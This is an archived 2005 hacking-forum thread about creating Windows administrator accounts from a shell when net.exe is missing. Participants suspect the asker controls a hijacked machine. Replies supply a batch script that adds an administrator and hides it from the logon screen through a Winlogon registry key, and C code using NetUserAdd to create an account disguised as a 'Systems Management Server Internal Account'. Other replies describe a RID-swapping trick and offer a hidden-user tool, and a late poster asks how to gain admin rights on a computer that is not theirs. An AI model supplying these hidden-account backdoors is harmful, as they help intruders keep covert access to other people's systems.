Hmmm, is it possible to add Admin-Users with reg-files and regedit from shell? Even searched on google for it...
Greetings
saetji
Apr 25 2005, 09:32 PM
Not using reg files as far as i konw - it has to be done from the net user command
tibbar
Apr 26 2005, 02:12 AM
i think it is possible, run regedit in the context of the LOCALSYSTEM and look at the new keys that previously were invisible.
remember that the SAM is actually part of the registry hive
belgther
Apr 26 2005, 05:29 AM
as far as i know, hidden admin users can be added there (or was it the way of hiding existing admin users from logon screen?) Maybe reversing the CPL file for user controls should do the trick...
PSR
Apr 26 2005, 12:12 PM
hmmm, that all wont help me :/
i think its not possible i think...the problem is, what can i do, when net.exe is damaged or not existent?
r00t
Apr 26 2005, 03:42 PM
QUOTE(PSR @ Apr 26 2005, 12:12 PM)
hmmm, that all wont help me :/
i think its not possible i think...the problem is, what can i do, when net.exe is damaged or not existent?
When the net.exe is damaged there should be (depends on os) a net1.exe. You also can use these. When you delete the net.exe maybe a mistake. The new Windows OS regenerate it from %windir%\system32\dllcache\.
When you think it's damaged you can delete it and it should copy a working once from %windir%\system32\dllcache\.
The Info about regenerating I only tested on Windows XP ! dont know if it works at older versions too.
If you have WinXP and up and you havent a net.exe in dllcache it can be you system is corrupted.
Script kiddies "Hackers " Use methods like thest to "secure" theyre "hacked" boxes.
You schould take a look if you find files like ftp.exe , tftp.exe, rcp.exe, wich these kiddies also delete a lot of times.
The best way is to search them in %windir%\system32\dllcache\ when you have a actuall OS like XP.
You have to chance view settings and show hidden files and System files to see it!
It also can be that they installed a rootkit on your machine and made files ftp.exe etc. hidden.... Then use maybe tools like rootkitrevealer from sysinternals (google will do the job).
Srry for my poor english still learning
I hope i could help you a bit....
da_cash
Apr 26 2005, 06:15 PM
maybe i'm wrong but if net.exe is corrupted you can always start the sfc check
SFC /SCANNOW
then if the file integrity is corrupted the system will promt to insert cd to fix bad files.
assom
Apr 26 2005, 11:09 PM
He is explicitly saying "from shell" so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!! that would be a nice thing to do
r00t
Apr 26 2005, 11:15 PM
QUOTE(assom @ Apr 26 2005, 11:09 PM)
He is explicitly saying "from shell" so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!! that would be a nice thing to do
Hei assom
I laso thought abit in that way as i read the question ;-)
KoNh
Apr 27 2005, 12:09 AM
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
1) Sysop knows what script kiddies use to get in there boxes 2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (i doubt). Well you've tryed, after some time trying you will have to learn that you can loose sometimes, this is a "hacker way to do" too. Then you will try harder on next one after "googleling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making, re-hacking is lame and punish by many people ou there, be carefull "stealing" other's HQ. Also your account on GSO could be deleted for that. But I guess you will explain us that it is your personal computer from wich you lost the key ...
r00t
Apr 27 2005, 01:31 AM
QUOTE(KoNh @ Apr 27 2005, 12:09 AM)
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
1) Sysop knows what script kiddies use to get in there boxes 2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (i doubt). Well you've tryed, after some time trying you will have to learn that you can loose sometimes, this is a "hacker way to do" too. Then you will try harder on next one after "googleling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making, re-hacking is lame and punish by many people ou there, be carefull "stealing" other's HQ. Also your account on GSO could be deleted for that. But I guess you will explain us that it is your personal computer from wich you lost the key ...
I also thought could be a stromaker , rehacker question... But i thought also could be he got hacked..... Or he deleted it, but then the os will regenerate it. But read my first reply for more info.
RFlash
Apr 27 2005, 07:43 AM
Not directly with a reg file (but I'm reading that was not the really request), but you could find here some good examples to do the job with a .vbs:
Found this exploit awhile back.. may still work. Not sure if it is what are really looking for but.. you can also change hex dec from the admin account to your users account. possiblly.. like user hex= 0x123 and administrator hex= 0x3ea. You will have to find the number for the account you are looking for. Also if you change that hexdec you will need to login as the Administrator with the USERS password. If it stills work....
kv-
White Scorpion
Apr 29 2005, 04:51 PM
what about writing a program yourself which can add users like net.exe can? I'm sure that would solve your problem.
ninar12
Apr 30 2005, 08:51 PM
yep scorpion
it will be the best way 2 code an tool that do that job but whats the api he should use ? give him some info and im sure he gonna code it himself
QUOTE
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
u forgotten rcp echo and debug
White Scorpion
May 1 2005, 03:07 PM
NetUserAdd is the most important one. it is located in netapi32.dll, open netapi32.dll with a program like PE explorer to look at the functions it exports. it has a lot more interesting API's
KarachiKing555
May 3 2005, 10:21 AM
U can add a hidden admin on machine via .bat here is the code !
CODE
net user HIDDEN-USER /add net localgroup administrators Raffye /add
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp.reg @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%SystemRoot%\tmp.reg @echo "Raffye"=dword:00000000>>%SystemRoot%\tmp.reg regedit /s %SystemRoot%\tmp.reg
Del %SystemRoot%\tmp.reg
i got a lil cmd line prog that puts an invisible user in administrator group (no matter what's the name of the administrator group). You must be administrator to do that dont know if i upload it here or not msg me if u want !! syntax: Hideuser.exe username pass or Hideuser.exe username -------> You'll be asked for a pass or Hideuser.exe --------> You'll be asked for an username and a pass
Erion
May 31 2005, 01:18 PM
I coded this long ago, but I am pretty sure it worked... Can't remember which permissions did the new user have though... that you'll have to look into
// Pointer to Function with 4 params and a return Value typedef NET_API_STATUS (*ptrNetUserAdd)(LMSTR, DWORD, LPBYTE, LPDWORD); typedef NET_API_STATUS (*ptrNetUserGetInfo)(LPWSTR, LPWSTR, DWORD, LPBYTE);
printf("\n%s coded by Erion for Minted\n\n", argv[0]);
handleDLL = LoadLibrary("netapi32.dll"); // Load the desired DLL
if (handleDLL != NULL) { NetUserAdd = (ptrNetUserAdd)GetProcAddress(handleDLL, "NetUserAdd"); // Search the Addres of the Function if(NetUserAdd) { // Convert the strings from ASCII to UNICODE len = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, 0, 0); MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, usrName, len); len = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, 0, 0); MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, usrPassWord, len);
ui.usri1_name = usrName; ui.usri1_password = usrPassWord; ui.usri1_priv = USER_PRIV_USER; ui.usri1_home_dir = NULL; ui.usri1_comment = L"DO NOT MODIFY. Systems Management Server Internal Account"; ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD; ui.usri1_script_path = NULL; // call the function nStatus = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError); if(nStatus != NERR_Success) { switch(nStatus) { case ERROR_ACCESS_DENIED: printf("ACCESS DENIED.\n");break; case NERR_InvalidComputer:printf("The computer name is invalid.\n");break; case NERR_NotPrimary:printf("The operation is allowed only on the primary domain controller of the domain.\n");break; case NERR_GroupExists:printf("The group already exists.\n");break; case NERR_UserExists:printf("The user account already exists.\n");break; case NERR_PasswordTooShort:printf("The password is shorter than required.\n");break; default: printf("Unknown Error %d!\n", dwError);break; } } else printf("User %s added succesfully\n", argv[1]); } else printf("Couldn't get the NetUserAdd Address\n"); } else printf("LoadLibrary() failed for netapi32.dll\n");
FreeLibrary(handleDLL); }
Erion
May 31 2005, 01:20 PM
ooops, posted it twice
GekAapie
Jun 23 2005, 12:13 PM
I have an account on another comp i just got but there i only got an account with lots of limits i want to change this but how do i do this cause i don't have the pass or name of the ADMIN account..
(the comp runs on win2000)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
...
